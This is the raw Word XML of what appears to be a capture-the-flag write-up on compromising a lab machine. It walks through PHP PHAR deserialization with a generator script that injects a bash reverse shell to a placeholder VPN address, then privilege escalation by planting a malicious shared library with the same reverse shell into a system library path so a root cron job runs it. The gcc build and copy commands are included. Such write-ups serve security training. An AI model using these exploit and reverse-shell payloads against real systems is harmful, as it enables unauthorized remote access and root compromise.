    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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//Create a new instance of the Dummy class and modify its property</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$dummy = new Package();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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//$dummy-&gt;callback = "passthru";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$dummy-&gt;package_name = "$(/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1' ) "; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Delete any existing PHAR archive with that name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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@unlink("exp.phar");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Create a new archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$poc = new Phar("exp.phar");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Add all write operations to a buffer, without modifying the archive on disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$poc-&gt;startBuffering();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Set the stub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$poc-&gt;setStub("&lt;?php echo 'Here is the STUB!'; __HALT_COMPILER();");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Add a new file in the archive with "text" as its content*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$poc["file"] = "text";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Add the dummy object to the metadata. This will be serialized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$poc-&gt;setMetadata($dummy);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Stop buffering and write changes to disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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$poc-&gt;stopBuffering();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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62">
      <w:pPr>
        <w:jc w:val="both"/>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6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generate the phar file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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php phargen.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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86000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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If you get an error while generating the file, you can disable →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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phar.readonly = Off</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) in → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php.ini</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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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47900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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use a Python server to host our file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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52700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87"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6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33600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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Now pass our URL in → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Image Downloader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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495800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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13000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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get the path of our file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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11400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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trigger the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filesize()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function on it but using</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"phar://./"</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before it to make it work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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660900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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get a shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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22500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.257x4peujxe7" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell tty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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a simple shell to fully interactive TTYs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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python3 -c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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7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7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7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7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11400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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ewbhb7ek43p2" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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1vipv28h87v" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivEsc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Going to the directory → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/git-monitorer/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we have a C script. Reading this script, we can retrieve the second flag → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gitmon.c</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8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08300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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Reading it </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://readme.md/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> , we can see how the script was installed and a bit about how it works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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16200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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One interesting thing is that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gitmon</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script is in a cron job, so it will be executed periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">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9ghntv7xzabg" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Library Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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script uses a shared library. We can replace the library it is using with our own and override the function the script uses — in this case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check_git_safety()</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8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this, we can create this library on our machine and include a reverse shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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void check_git_safety() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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system("bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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8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27200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="84"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then compile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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gcc libgitutils.c -fpic -c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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gcc -shared -o libgitutils.so libgitutils.o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:jc w:val="both"/>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9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73300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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compiling, we can start a Python server and download our library into → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp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9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74900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>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9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22500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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Now we copy our malicious library to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib/x86_64-linux-gnu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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cp libgitutils.so /lib/x86_64-linux-gnu/libgitutils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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52600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>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Then just wait for the cron job to execute so we can receive our shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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get a shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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98700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>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just need to read the last two flags.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">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209800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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jc w:val="both"/>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A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cat db.sql | grep "uhc"</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5943600" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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5943600" cy="2286000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId48" w:type="default"/>
      <w:headerReference r:id="rId49" w:type="first"/>
      <w:headerReference r:id="rId50" w:type="even"/>
      <w:footerReference r:id="rId51" w:type="default"/>
      <w:footerReference r:id="rId52" w:type="first"/>
      <w:footerReference r:id="rId53"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A4">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="12"/>
    <w:bookmarkEnd w:id="12"/>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83" name="image25.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image25.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A5">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A6">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2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5" name="image8.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image8.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Chuvinha ENG</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36.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image36.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2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image" Target="media/image34.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId45"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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId4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13.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://readme.md/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2019/06/26/exploiting_php_phar-PRD7.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/PHP.md#php-phar-deserialization" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=fHZKSCMWqF4" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/internetwache/GitTools.git" TargetMode="External"/><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19.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.urldecode.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5.jpg"/><Relationship Id="rId2"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36.png"/></Relationships>
</file>

